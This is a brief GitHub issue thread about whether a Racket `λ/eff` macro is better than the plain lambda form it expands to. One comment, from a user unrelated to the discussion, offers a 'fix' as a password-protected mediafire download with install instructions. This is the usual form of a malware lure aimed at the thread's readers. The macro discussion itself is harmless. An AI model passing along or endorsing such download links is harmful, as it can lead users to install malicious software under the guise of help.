### ISSUE TITLE
`do` macro

### ISSUE THREAD

**Issue by dannypsnl** [dannypsnl/continuation-tag#10]
```rkt
(λ/eff eff (args ...) f)
```
=
```rkt
(λ (args ...) ((f args ...) eff))
```

Not sure this is better.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by dannypsnl** [comment]
Not better
